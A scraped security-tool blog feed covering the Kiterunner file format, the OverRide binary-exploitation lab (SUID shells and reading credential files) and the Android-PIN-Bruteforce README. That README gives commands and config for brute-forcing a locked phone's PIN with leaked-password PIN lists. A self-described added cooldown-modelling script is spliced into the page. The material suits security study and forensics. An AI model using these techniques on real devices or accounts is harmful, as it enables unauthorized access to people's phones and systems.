7e6b2ea1-c662-4671-9eaa-e8cd31b463f2<br /><br />User is not authorized to perform this action</code></pre></div> <br /><span style="font-size: x-large;"><b>Technical Implementation</b></span><br /> <br /><span style="font-size: large;"><b>Intermediate Data Type (PRoutes)</b></span><br /> <p>We use an <a href="https://www.kitploit.com/search/label/Intermediate%20Representation" target="_blank" title="intermediate representation">intermediate representation</a> of wordlists and kitebuilder JSON schemas in kiterunner. This allows us to dynamically generate the fields in the wordlist and reconstruct request bodies, headers and query parameters from a given spec.</p> <p>The PRoute type is composed of Header, Body, Query and Cookie parameters that are encoded as <code>pkg/proute.Crumb</code>. The Crumb type is an interface that is implemented on types such as UUIDs, Floats, Ints, Random Strings, etc.</p> <p>When performing conversions to and from txt, json and kite files, all conversions are first done to the <code>proute.API</code> intermediate type. Then the corresponding encoding is written out.</p> <br /><span style="font-size: large;"><b>Kite File Format</b></span><br /> <p>We use a super secret kite file format for storing the JSON schemas from kitebuilder. These are simply protobuf-encoded <code>pkg/proute.APIS</code> written to a file. The compilation allows us to quickly deserialize the already parsed wordlist. 
This file format is not stable, and should only be interacted with using the inbuilt conversion tools for kiterunner.</p> <p>When a new version of the kite file format is released, you may need to recompile your kite files.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/assetnote/kiterunner" rel="nofollow" target="_blank" title="Download Kiterunner">Download Kiterunner</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-17691178398994927732021-04-24T17:30:00.022-04:002021-04-24T17:30:00.349-04:00OverRide - Binary Exploitation And Reverse-Engineering (From Assembly Into C)<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-Xs7VjGHtrbY/YIJaoHGvHpI/AAAAAAAAV7w/ufd4B8ALFVcN4vgBy-OeNIvi-8WDTK-ZwCNcBGAsYHQ/s1634/OverRide_1_ssh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="522" data-original-width="1634" height="204" src="https://1.bp.blogspot.com/-Xs7VjGHtrbY/YIJaoHGvHpI/AAAAAAAAV7w/ufd4B8ALFVcN4vgBy-OeNIvi-8WDTK-ZwCNcBGAsYHQ/w640-h204/OverRide_1_ssh.png" width="640" /></a></div><p><br /></p> <p>Explore disassembly, <a href="https://www.kitploit.com/search/label/Binary%20Exploitation" target="_blank" title="binary exploitation">binary exploitation</a> & reverse-engineering through 10 little challenges.</p> <p>In the folder for each level you will find:</p> <ul> <li> <p><strong>flag</strong> - password for next level</p> </li> <li> <p><strong>README.md</strong> - how to find password</p> </li> <li> <p><strong>source.c</strong> - the reverse engineered binary</p> </li> <li> <p><strong>dissasembly_notes.md</strong> - notes on asm</p> </li> </ul> <p>See the <a href="https://github.com/anyashuka/Override/blob/main/subject.pdf" rel="nofollow" target="_blank" title="subject">subject</a> for more details.</p> <p>For more gdb & <a 
href="https://www.kitploit.com/search/label/Exploitation" target="_blank" title="exploitation">exploitation</a> fun check out the previous project <a href="https://github.com/anyaschukin/RainFall" rel="nofollow" target="_blank" title="RainFall">RainFall</a>.</p><b>Final Score 125/100<br /></b><span><a name='more'></a></span><div><br /></div><div><span style="font-size: large;"><b>Getting Started</b></span><br /> <p>First, download <a href="https://projects.intra.42.fr/uploads/document/document/2096/OverRide.iso" rel="nofollow" target="_blank" title="Binary Exploitation and Reverse-Engineering (from assembly into C) (5)"><em>OverRide.iso</em></a> from 42.</p> <br /><b>Virtual Machine setup</b><br /> <p>On Mac OS X, install <a href="https://www.virtualbox.org/" rel="nofollow" target="_blank" title="VirtualBox">VirtualBox</a>.</p> <p>In VirtualBox create a new VM (click New).</p> <ul> <li>Name and operating system - Type: Linux, Version: (Oracle 64-bit)</li> </ul> <p>Continue through all the next steps with the default settings:</p> <ul> <li>Memory size: 4MB</li> <li>Hard disk: Create a disk now</li> <li>Hard disk file type: VDI (VirtualBox Disk Image)</li> <li>Storage on physical hard disk: Dynamically allocated</li> <li>File size: 12,00GB</li> </ul> <p>Next click Settings > Network > Adapter 1 > Attached to: Bridged Adapter.</p> <p>Still in Settings, click Storage > to the right of "Controller: IDE" there is a CD icon with a + sign (add optical drive). 
Click Add Disk Image, and select <em>OverRide.iso</em>.</p> <p>Click Start to start the VM; once running, it should show the VM IP address and prompt the user to log in.</p> <br /><b>SSH connect</b><br /> <p>Log in from a separate shell as user <em>level00</em> with password <em>level00</em>.</p> <p><code>ssh level00@{VM_IP} -p 4242</code></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-GvSFZ7oAPss/YIJa9u-D-6I/AAAAAAAAV74/nqOlSvwv2ewdiy39Zyyr5kJFqrkjNKcJACNcBGAsYHQ/s1634/OverRide_1_ssh.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="522" data-original-width="1634" height="204" src="https://1.bp.blogspot.com/-GvSFZ7oAPss/YIJa9u-D-6I/AAAAAAAAV74/nqOlSvwv2ewdiy39Zyyr5kJFqrkjNKcJACNcBGAsYHQ/w640-h204/OverRide_1_ssh.png" width="640" /></a></div><p><br /></p><b>Level Up</b><br /> <p>As user <em>level00</em> the goal is to read the password for user <em>level01</em>, found at <em>/home/users/level01/.pass</em>. 
However, user <em>level00</em> does not have permissions to read this file.</p> <p>In the home folder for user <em>level00</em> is a binary <em>level00</em> with SUID set and owner <em>level01</em>.</p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-8lWjYZOf80A/YIJbDTPRhBI/AAAAAAAAV78/0xidIsYllsolZYbZOZQjszKO03lhuG_5wCNcBGAsYHQ/s770/OverRide_2_suid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="108" data-original-width="770" height="90" src="https://1.bp.blogspot.com/-8lWjYZOf80A/YIJbDTPRhBI/AAAAAAAAV78/0xidIsYllsolZYbZOZQjszKO03lhuG_5wCNcBGAsYHQ/w640-h90/OverRide_2_suid.png" width="640" /></a></div><p><br /></p> <p>This means when we execute the binary <em>level00</em>, we do so with the permissions of user <em>level01</em>.</p> <p>We must find a <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="vulnerability">vulnerability</a> in the binary <em>level00</em> with gdb. 
Then exploit the vulnerability to run <em>system("/bin/sh")</em>, opening a shell as user <em>level01</em> where we have permissions to read the password.</p> <p><code>cat /home/users/level01/.pass</code></p> <p>Then log in as user <em>level01</em>.</p> <p><code>su level01</code></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dWFPlyrND88/YIJbIn62ZYI/AAAAAAAAV8A/tGYQ64TVxG8xZrzYxOs9GshbSPE9O4YngCNcBGAsYHQ/s587/OverRide_3_su.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="252" data-original-width="587" height="274" src="https://1.bp.blogspot.com/-dWFPlyrND88/YIJbIn62ZYI/AAAAAAAAV8A/tGYQ64TVxG8xZrzYxOs9GshbSPE9O4YngCNcBGAsYHQ/w640-h274/OverRide_3_su.png" width="640" /></a><span style="text-align: left;"> </span></div> <p>Repeat for each level.</p> <br /><span style="font-size: large;"><b>Reverse-engineered binary</b></span><br /> <p>For each level, we reverse engineered the original <em>source.c</em> by examining the gdb disassembly of the binary.</p> <br /><span style="font-size: large;"><b>Levels Overview</b></span><br /> <ul> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level00" rel="nofollow" target="_blank" title="0">0</a> - Hardcoded password</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level01" rel="nofollow" target="_blank" title="1">1</a> - Ret2Libc attack</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level02" rel="nofollow" target="_blank" title="2">2</a> - printf() format string attack</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level03" rel="nofollow" target="_blank" title="3">3</a> - Brute force password</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level04" rel="nofollow" target="_blank" title="4">4</a> - gets() stack overflow + Return-to-libc attack</p> </li> <li> <p><a 
href="https://github.com/anyashuka/Override/tree/main/level05" rel="nofollow" target="_blank" title="5">5</a> - Shellcode in env variable + printf() format string attack</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level06" rel="nofollow" target="_blank" title="6">6</a> - Hash value discoverable with gdb</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level07" rel="nofollow" target="_blank" title="7">7</a> - Ret2Libc Attack on unprotected data table</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level08" rel="nofollow" target="_blank" title="8">8</a> - Binary backs up password via symlink</p> </li> <li> <p><a href="https://github.com/anyashuka/Override/tree/main/level09" rel="nofollow" target="_blank" title="9">9</a> - Off-by-one error</p> </li> </ul> <br /><span style="font-size: large;"><b>Team</b></span><br /> <p>I wrote this project in a team with the awesome <a href="https://github.com/dfinnis" rel="nofollow" target="_blank" title="@dfinnis">@dfinnis</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/anyaschukin/OverRide" rel="nofollow" target="_blank" title="Download OverRide">Download OverRide</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-91350405154304897182021-04-17T08:30:00.033-04:002021-04-17T08:30:00.320-04:00Android-PIN-Bruteforce - Unlock An Android Phone (Or Device) By Bruteforcing The Lockscreen PIN<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-vC53ouNt_VU/YHYwLilxXMI/AAAAAAAAV4w/NatBA4yVXqgNYgLW5FmQyx2mpKX8XLMrQCNcBGAsYHQ/s989/Android-PIN-Bruteforce_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="684" data-original-width="989" height="442" 
src="https://1.bp.blogspot.com/-vC53ouNt_VU/YHYwLilxXMI/AAAAAAAAV4w/NatBA4yVXqgNYgLW5FmQyx2mpKX8XLMrQCNcBGAsYHQ/w640-h442/Android-PIN-Bruteforce_1.png" width="640" /></a></div><p><br /></p> <p>Unlock an Android phone (or device) by <a href="https://www.kitploit.com/search/label/Bruteforcing" target="_blank" title="bruteforcing">bruteforcing</a> the lockscreen PIN.</p> <p>Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices!</p><span style="font-size: large;"><b> How it works</b></span><br /> <p>It uses a USB OTG cable to connect the locked phone to the Nethunter device. It emulates a keyboard, automatically tries PINs, and waits after trying too many wrong guesses.</p> <p>[Nethunter phone] &lt;--&gt; [USB cable] &lt;--&gt; [USB OTG adaptor] &lt;--&gt; [Locked Android phone]</p> <p>The USB HID Gadget driver provides emulation of USB Human Interface Devices (HID). This enables an Android Nethunter device to emulate keyboard input to the locked phone. It's just like plugging a keyboard into the locked phone and pressing keys.</p> <p>This takes just over 16.6 hours with a Samsung S5 to try all possible 4 digit PINs, but with the optimised PIN list it should take you much less time.</p> <b>You will need</b><br /> <ul> <li>A locked Android phone</li> <li>A Nethunter phone (or any rooted Android with HID kernel support)</li> <li>USB OTG (On The Go) cable/adapter (USB male Micro-B to female USB A), and a standard charging cable (USB male Micro-B to male A).</li> <li>That's all!</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b> Benefits</b></span><br /> <ul> <li>Turn your NetHunter phone into an Android PIN cracking machine</li> <li>Unlike other methods, you do not need ADB or USB debugging enabled on the locked phone</li> <li>The locked Android phone does not need to be rooted</li> <li>You don't need to buy special hardware, e.g. 
Rubber Ducky, Teensy, Cellebrite, XPIN Clip, etc.</li> <li>You can easily modify the backoff time to crack other types of devices</li> <li>It works!</li></ul><div><br /></div><span style="font-size: large;"><b> Features</b></span><br /> <ul> <li>Crack PINs of any length from 1 to 10 digits</li> <li>Use config files to support different phones</li> <li>Optimised PIN lists for 3, 4, 5 and 6 digit PINs</li> <li>Bypasses phone pop-ups including the Low Power warning</li> <li>Detects when the phone is unplugged or powered off, and waits while retrying every 5 seconds</li> <li>Configurable delays of N seconds after every X PIN attempts</li> <li>Log file</li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <p>TBC</p> <br /><span style="font-size: large;"><b>Executing the script</b></span><br /> <p>If you installed the script to /sdcard/, you can execute it with the following command.</p> <p><code>bash ./android-pin-bruteforce</code></p> <p>Note that Android mounts /sdcard with the noexec flag. 
You can verify this with <code>mount</code>.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code><br />Android-PIN-Bruteforce (0.1) is used to unlock an Android phone (or device) by bruteforcing the lockscreen PIN.<br /> Find more information at: https://github.com/urbanadventurer/Android-PIN-Bruteforce<br /><br />Commands:<br /> crack Begin cracking PINs<br /> resume Resume from a chosen PIN<br /> rewind Crack PINs in reverse from a chosen PIN<br /> diag Display diagnostic information<br /> version Display version information and exit<br /><br />Options:<br /> -f, --from PIN Resume from this PIN<br /> -a, --attempts Starting from NUM incorrect attempts<br /> -m, --mask REGEX Use a mask for known digits in the PIN<br /> -t, --type TYPE Select PIN or PATTERN cracking<br /> -l, --length NUM Crack PINs of NUM length<br /> -c, --config FILE Specify configuration file to load<br /> -p, --pinlist FILE Specify a custom PIN list<br /> -d, --dry-run Dry run for testing. Doesn't send any keys.<br /> -v, --verbose Output verbose logs<br /><br />Usage:<br /> android-pin-bruteforce &lt;command&gt; [options]<br /></code></pre> <br /><span style="font-size: large;"><b>Supported Android Phones/Devices</b></span><br /> <p>This has been successfully tested with various phones including the Samsung S5, S7, Motorola G4 Plus and G5 Plus.</p> <p>It can unlock Android versions 6.0.1 through to 10.0. The ability to perform a bruteforce attack doesn't depend on the Android version in use. 
It depends on how the device vendor developed their own lockscreen.</p> <p>Check the Phone Database for more details: <a href="https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database" rel="nofollow" target="_blank" title="https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database">https://github.com/urbanadventurer/Android-PIN-Bruteforce/wiki/Phone-Database</a></p><p><br /></p><span style="font-size: large;"><b> PIN Lists</b></span><br /> <p>Optimised PIN lists are used by default unless the user selects a custom PIN list.</p> <br /><b>Cracking PINs of different lengths</b><br /> <p>Use the <code>--length</code> commandline option.</p> <p>Use this command to crack a 3 digit PIN: <code>./android-pin-bruteforce crack --length 3</code></p> <p>Use this command to crack a 6 digit PIN: <code>./android-pin-bruteforce crack --length 6</code></p> <br /><b>Where did the optimised PIN lists come from?</b><br /> <p>The optimised PIN lists were generated by extracting numeric passwords from database leaks, then sorting by frequency. All PINs that did not appear in the password leaks were appended to the list.</p> <p>The optimised PIN lists were generated from <em>Ga$$Pacc DB Leak</em> (21GB decompressed, 688M Accounts, 243 Databases, 138920 numeric passwords).</p> <br /><b>The 4 digit PIN list</b><br /> <p>The reason that the 4 digit PIN list is taken from a different source is that it gives better results than the generated list from <em>Ga$$Pacc DB Leak</em>.</p> <p><code>optimised-pin-length-4.txt</code> is an optimised list of all possible 4 digit PINs, sorted by order of likelihood. 
It can be found with the filename <code>pinlist.txt</code> at <a href="https://github.com/mandatoryprogrammer/droidbrute" rel="nofollow" target="_blank" title="https://github.com/mandatoryprogrammer/droidbrute">https://github.com/mandatoryprogrammer/droidbrute</a></p> <p>This list is used with permission from Justin Engler &amp; Paul Vines (Senior Security Engineer, iSEC Partners), and was used in their Defcon talk, <a href="https://www.defcon.org/html/defcon-21/dc-21-speakers.html#Engler" rel="nofollow" target="_blank" title="Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)">Electromechanical PIN Cracking with Robotic Reconfigurable Button Basher (and C3BO)</a>.</p> <br /><b>Cracking with Masks</b><br /> <p>Masks use <a href="https://www.kitploit.com/search/label/Regular%20Expressions" target="_blank" title="regular expressions">regular expressions</a> in the standard grep extended format.</p> <p><code>./android-pin-bruteforce crack --mask "...[45]" --dry-run</code></p> <ul> <li>To try all years from 1900 to 1999, use a mask of <code>19..</code></li> <li>To try PINs that have a 1 in the first digit, and a 1 in the last digit, use a mask of <code>1..1</code></li> <li>To try PINs that end in 4 or 5, use <code>...[45]</code></li></ul><div><br /></div><span style="font-size: large;"><b> Configuration for different phones</b></span><br /> <p>Device manufacturers create their own lock screens that are different to the default or stock Android. 
To find out what keys your phone needs, plug a keyboard into the phone and try out different combinations.</p> <p>Load a different configuration file, with the <code>--config FILE</code> commandline parameter.</p> <p>Example: <code>./android-pin-bruteforce --config ./config.samsung.s5 crack</code></p> <p>You can also edit the <code>config</code> file by customising the timing and keys sent.</p> <p>The following configuration variables can be used to support a different phone's lockscreen.</p> <pre><code># Timing<br />## DELAY_BETWEEN_KEYS is the period of time in seconds to wait after each key is sent<br />DELAY_BETWEEN_KEYS=0.25<br /><br />## The PROGRESSIVE_COOLDOWN_ARRAY variables act as multi-dimensional array to customise the progressive cooldown<br />## PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________ is the attempt number<br />## PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN is how many attempts to try before cooling down<br />## PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____ is the cooldown in seconds<br /><br />PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)<br />PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)<br />PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)<br /><br />## SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END defines how many seconds before the end of the cooldown period, keys will be sent<br /># set to 0 to disable<br />SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END=5<br />## SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END configures the keys that are sent to dismiss messages and popups before the end of the cooldown period<br />SEND_KEYS_DISMISS_POPUPS_AT_COOLDOWN_END="enter enter enter"<br /><br />## KEYS_BEFORE_EACH_PIN configures the keys that are sent to prompt the lock screen to appear. 
This is sent before each PIN.<br />## By default it sends "escape enter", but some phones will respond to other keys.<br /><br /># Examples:<br /># KEYS_BEFORE_EACH_PIN="ctrl_escape enter"<br /># KEYS_BEFORE_EACH_PIN="escape space"<br />KEYS_BEFORE_EACH_PIN="escape enter"<br /><br />## KEYS_STAY_AWAKE_DURING_COOLDOWN the keys that are sent during the cooldown period to keep the phone awake<br />KEYS_STAY_AWAKE_DURING_COOLDOWN="enter"<br /><br />## SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS how often the keys are sent, in seconds<br />SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS=5<br /><br />## DELAY_BEFORE_STARTING is the period of time in seconds to wait before the bruteforce begins<br />DELAY_BEFORE_STARTING=2<br />## KEYS_BEFORE_STARTING configures the keys that are sent before the bruteforce begins<br />KEYS_BEFORE_STARTING="enter"<br /></code></pre> <br /><b>Popups</b><br /> <p>We send keys before the end of the cooldown period, or optionally during the cooldown period. This is to keep the lockscreen app active and to dismiss any popups about the number of incorrect PIN attempts or a low battery warning.</p> <br /><span style="font-size: large;"><b>Test sending keys from the NetHunter phone</b></span><br /> <br /><b>Test sending keys from the terminal</b><br /> <p>Use ssh from your laptop to the NetHunter phone, and use this command to test sending keys.</p> <p>In this example, the enter key is sent.</p> <p><code>echo "enter" | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>In this example, ctrl-escape is sent.</p> <p><code>echo "left-ctrl escape" | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>Note: Sending combinations of keys in <code>config</code> file variables is different. 
Currently only <code>ctrl_escape</code> is supported.</p> <p>In this example, keys a, b, c are sent.</p> <p><code>echo a b c | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <br /><b>Test sending keys from an app</b><br /> <p>This Android app is a virtual USB Keyboard that you can use to test sending keys.</p> <p><a href="https://store.nethunter.com/en/packages/remote.hid.keyboard.client/" rel="nofollow" target="_blank" title="https://store.nethunter.com/en/packages/remote.hid.keyboard.client/">https://store.nethunter.com/en/packages/remote.hid.keyboard.client/</a></p> <br /><b>How to send special keys</b><br /> <p>Use this list for the following variables:</p> <ul> <li>KEYS_BEFORE_EACH_PIN</li> <li>KEYS_STAY_AWAKE_DURING_COOLDOWN</li> <li>KEYS_BEFORE_STARTING</li> </ul> <p>To send special keys use the following labels. This list can be found in the hid_gadget_test source code.</p> <table> <tr> <th>Key label</th> <th>Key label</th> </tr> <tr> <td>left-ctrl</td> <td>f6</td> </tr> <tr> <td>right-ctrl</td> <td>f7</td> </tr> <tr> <td>left-shift</td> <td>f8</td> </tr> <tr> <td>right-shift</td> <td>f9</td> </tr> <tr> <td>left-alt</td> <td>f10</td> </tr> <tr> <td>right-alt</td> <td>f11</td> </tr> <tr> <td>left-meta</td> <td>f12</td> </tr> <tr> <td>right-meta</td> <td>insert</td> </tr> <tr> <td>return</td> <td>home</td> </tr> <tr> <td>esc</td> <td>pageup</td> </tr> <tr> <td>bckspc</td> <td>del</td> </tr> <tr> <td>tab</td> <td>end</td> </tr> <tr> <td>spacebar</td> <td>pagedown</td> </tr> <tr> <td>caps-lock</td> <td>right</td> </tr> <tr> <td>f1</td> <td>left</td> </tr> <tr> <td>f2</td> <td>down</td> </tr> <tr> <td>f3</td> <td>kp-enter</td> </tr> <tr> <td>f4</td> <td>up</td> </tr> <tr> <td>f5</td> <td>num-lock</td> </tr> </table> <p>To send more than one key at the same time, use the following list:</p> <ul> <li>ctrl_escape (This sends left-ctrl and escape)</li> </ul> <p>If you need more key combinations please open a new issue in the GitHub issues list.</p> <br 
/><b>Customising the Progressive Cooldown</b><br /> <p>The following section of the <code>config</code> file controls the progressive cooldown.</p> <pre><code>## The PROGRESSIVE_COOLDOWN_ARRAY variables act as multi-dimensional array to customise the progressive cooldown<br />## PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________ is the attempt number<br />## PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN is how many attempts to try before cooling down<br />## PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____ is the cooldown in seconds<br /><br />PROGRESSIVE_ARRAY_ATTEMPT_COUNT__________=(1 11 41)<br />PROGRESSIVE_ARRAY_ATTEMPTS_UNTIL_COOLDOWN=(5 1 1)<br />PROGRESSIVE_ARRAY_COOLDOWN_IN_SECONDS____=(30 30 60)<br /><br /></code></pre> <p>The array is equivalent to this table.</p> <table> <tr> <th>attempt number</th> <th>attempts until cooldown</th> <th>cooldown (seconds)</th> </tr> <tr> <td>1</td> <td>5</td> <td>30</td> </tr> <tr> <td>11</td> <td>1</td> <td>30</td> </tr> <tr> <td>41</td> <td>1</td> <td>60</td> </tr> </table> <br /><b>Why can't you use a laptop?</b><br /> <p>This works from an Android phone because the USB ports are not bidirectional, unlike the ports on a laptop.</p> <br /><b>How Android emulates a keyboard</b><br /> <p>Keys are sent using <code>/system/xbin/hid-keyboard</code>. To test this and send the key 1 you can use <code>echo 1 | /system/xbin/hid-keyboard /dev/hidg0 keyboard</code></p> <p>In Kali Nethunter, <code>/system/xbin/hid-keyboard</code> is a compiled copy of <code>hid_gadget_test.c</code>. This is a small program for testing the HID gadget driver that is included in the Linux kernel. 
The source code for this file can be found at <a href="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html" rel="nofollow" target="_blank" title="https://www.kernel.org/doc/html/latest/usb/gadget_hid.html">https://www.kernel.org/doc/html/latest/usb/gadget_hid.html</a> and <a href="https://github.com/aagallag/hid_gadget_test" rel="nofollow" target="_blank" title="https://github.com/aagallag/hid_gadget_test">https://github.com/aagallag/hid_gadget_test</a>.</p> <br /><span style="font-size: large;"><b>Troubleshooting</b></span><br /> <br /><b>If it is not bruteforcing PINs</b><br /> <br /><b>Check the orientation of the cables</b><br /> <p>The Nethunter phone should have a regular USB cable attached, while the locked phone should have an OTG adaptor attached.</p> <p>The OTG cable should be connected to the locked Android phone. The regular USB cable should be connected to the Nethunter phone.</p> <p>Refer to the graphic on how to connect the phones.</p> <br /><b>Check it is emulating a keyboard</b><br /> <p>You can verify that the NetHunter phone is successfully emulating a keyboard by connecting it to a computer using a regular charging/data USB cable. Open a text editor like Notepad while it is cracking and you should see it entering PIN numbers into the text editor.</p> <p>Note that you will not need an OTG cable for this.</p> <br /><b>Try restarting the phones</b><br /> <p>Try powering off the phones and even taking out the batteries if that is possible.</p> <br /><b>Try new cables</b><br /> <p>Try using new cables/adaptors as you may have a faulty cable/adaptor.</p> <br /><b>If it doesn't unlock the phone with a correct PIN</b><br /> <p>You might be sending keys too fast for the phone to process. Increase the DELAY_BETWEEN_KEYS variable in the config file. If you don't see 4 dots come up on the phone's screen then maybe it is not receiving 4 keys.</p> 
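<p>To see what the progressive cooldown schedule from the <code>config</code> block and the "Customising the Progressive Cooldown" table actually costs in enforced waiting time (the figure a defender uses to judge how well a lockscreen throttles guessing), here is an added POSIX shell example; it is not code from the Android-PIN-Bruteforce project. It assumes that each tier applies from its attempt number until the next tier begins, that a cooldown fires every "attempts until cooldown" attempts counted from the tier's first attempt, and it does not model the sub-second DELAY_BETWEEN_KEYS; the three value strings are the page's PROGRESSIVE_ARRAY_* arrays written as plain strings so the script runs under plain sh.</p>

```shell
#!/bin/sh
# Added example (not project code): model the progressive cooldown schedule.
# Values are the PROGRESSIVE_ARRAY_* arrays from the config block above,
# written as space-separated strings so this stays POSIX sh (no bash arrays).
PROGRESSIVE_ATTEMPT_COUNT="1 11 41"          # attempt number each tier starts at
PROGRESSIVE_ATTEMPTS_UNTIL_COOLDOWN="5 1 1"  # attempts per cooldown in that tier
PROGRESSIVE_COOLDOWN_SECONDS="30 30 60"      # length of that tier's cooldown

# nth INDEX WORD... : print the INDEX-th (1-based) word of the remaining args
nth() {
    i=$1; shift
    while [ "$i" -gt 1 ]; do shift; i=$((i - 1)); done
    printf '%s\n' "$1"
}

# tier_count : number of tiers configured
tier_count() { set -- $PROGRESSIVE_ATTEMPT_COUNT; echo "$#"; }

# tier_for_attempt N : index of the tier in force at attempt N (0 = none yet)
tier_for_attempt() {
    n=$1; i=0; tier=0
    for start in $PROGRESSIVE_ATTEMPT_COUNT; do
        i=$((i + 1))
        if [ "$n" -ge "$start" ]; then tier=$i; fi
    done
    echo "$tier"
}

# cooldown_after N : seconds the phone locks out after attempt N (0 if none).
# Assumption: within a tier, attempts are counted from the tier's first attempt.
cooldown_after() {
    n=$1; t=$(tier_for_attempt "$n")
    if [ "$t" -eq 0 ]; then echo 0; return; fi
    start=$(nth "$t" $PROGRESSIVE_ATTEMPT_COUNT)
    every=$(nth "$t" $PROGRESSIVE_ATTEMPTS_UNTIL_COOLDOWN)
    secs=$(nth "$t" $PROGRESSIVE_COOLDOWN_SECONDS)
    if [ $(((n - start + 1) % every)) -eq 0 ]; then echo "$secs"; else echo 0; fi
}

# total_cooldown N : enforced waiting time, in seconds, over attempts 1..N,
# summed per tier in closed form rather than by iterating every attempt.
total_cooldown() {
    n=$1; total=0; t=1; ntiers=$(tier_count)
    while [ "$t" -le "$ntiers" ]; do
        start=$(nth "$t" $PROGRESSIVE_ATTEMPT_COUNT)
        every=$(nth "$t" $PROGRESSIVE_ATTEMPTS_UNTIL_COOLDOWN)
        secs=$(nth "$t" $PROGRESSIVE_COOLDOWN_SECONDS)
        if [ "$t" -lt "$ntiers" ]; then
            nxt=$(nth $((t + 1)) $PROGRESSIVE_ATTEMPT_COUNT)
            end=$((nxt - 1))            # tier ends where the next one begins
        else
            end=$n                      # last tier runs to the end
        fi
        if [ "$end" -gt "$n" ]; then end=$n; fi
        if [ "$end" -ge "$start" ]; then
            count=$((end - start + 1))
            total=$((total + (count / every) * secs))
        fi
        t=$((t + 1))
    done
    echo "$total"
}

# Usage: show where the lockouts fall in the first 12 attempts, then the
# total enforced wait the policy imposes over 100 guesses.
for a in 1 2 3 4 5 6 10 11 12; do
    printf 'attempt %2d: tier %s, cooldown %ss\n' "$a" \
        "$(tier_for_attempt "$a")" "$(cooldown_after "$a")"
done
printf 'enforced wait over 100 guesses: %ss\n' "$(total_cooldown 100)"
```

Change the three value strings to a phone-specific config (such as the config.samsung.s5 file referenced above) to compare how much waiting each vendor's lockout policy actually enforces.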
<br /><b>Managing Power Consumption</b><br /> <p>If your phone runs out of power too soon, follow these steps:</p> <ul> <li>Make sure both phones are fully charged to 100% before you begin</li> <li>Reduce the screen brightness on both the victim phone and the NetHunter phone if possible</li> <li>Place both phones into Airplane mode; however, you may want to enable WiFi to access the NetHunter phone via SSH.</li> <li>The locked phone will power the NetHunter phone, because it appears as a keyboard accessory</li> <li>Use a USB OTG cable with a Y splitter for an external power supply, to allow charging of the NetHunter phone while cracking</li> <li>Take breaks to charge your devices. Pause the script with <code>CTRL-Z</code> and resume with the <code>fg</code> shell command.</li> <li>Avoid the <code>SEND_KEYS_STAY_AWAKE_DURING_COOLDOWN_EVERY_N_SECONDS</code> configuration option. It causes the locked phone to use more battery to keep the screen powered. Instead use the <code>SEND_KEYS_DISMISS_POPUPS_N_SECONDS_BEFORE_COOLDOWN_END</code> option (the default).</li> </ul> <br /><b>Check the Diagnostics Report</b><br /> <p>Use the <code>diag</code> command to display diagnostic information.</p> <p><code>bash ./android-pin-bruteforce diag</code></p> <p>If you receive this message when the USB cable is plugged in, try taking the battery out of the locked Android phone and power cycling it.</p> <p><code>[FAIL] HID USB device not ready. Return code from /system/xbin/hid-keyboard was 5.</code></p> <br /><b>How the usb-devices command works</b><br /> <p>The diagnostics command uses the <code>usb-devices</code> script, but only as part of determining whether the USB cables are incorrectly connected. 
